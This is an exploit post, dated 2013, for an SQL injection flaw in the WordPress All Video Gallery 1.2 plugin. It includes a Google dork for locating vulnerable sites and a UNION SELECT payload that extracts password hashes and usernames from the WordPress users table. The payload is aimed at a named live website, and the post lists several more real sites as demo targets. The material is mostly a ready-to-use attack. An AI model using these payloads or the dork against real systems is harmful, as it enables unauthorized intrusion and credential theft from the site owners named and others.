facebook facebook twitter rss

Wordpress All Video Gallery 1.2 SQL Injection Vulnerability

Author: JoKeR_StEx , Published: 26-10-2013
=============================================
# Exploit Title: Wordpress All Video Gallery 1.2 SQL Injection Vulnerability
# Google Dork: inurl:"/wp-content/plugins/all-video-gallery/"
# Date: 04/09/2013
# Exploit Author: [JoKeR_StEx]
# Vendor Homepage: [link]
# Version: 1.2
# Tested on: WinXP SP3 , Linux
# CVE : [--]
============================================================================================
Exploit :

http://www.site.com/path/wp-content/plugins/all-video-gallery/config.php?vid=8&pid=1[inj3ct Here]

/#/D3m0 :

http://www.casaprestige.ae/AR/wp-content/plugins/all-video-gallery/config.php?vid=-2/**/union/**/select/**/1,2,3,4,group_concat%28user_pass,0x3a,user_login%29,6,7,8,9,10,11,12,13,14,15,16,17,18/**/from/**/wp_3_users--&pid=1

/#/D3m0 Websites :

=============================================================================================

http://www.casaprestige.ae/AR/wp-content/plugins/all-video-gallery/config.php?vid=2&pid=1

http://doanhnhanvietnamonline.com/wp-content/plugins/all-video-gallery/config.php?vid=3&pid=1

http://chopsticks.com.my/wp-content/plugins/all-video-gallery/config.php?vid=17&pid=1

=============================================================================================

Gr33t'z To : asesino04 , Team Dz S.O.S & all Algerian Hackers And Pentesters

=============================================================================================

FACEBOOK : https://www.facebook.com/imadlilong.lasvegas
EMAIL : jokerdz44@yahoo.fr

Like us on Facebook :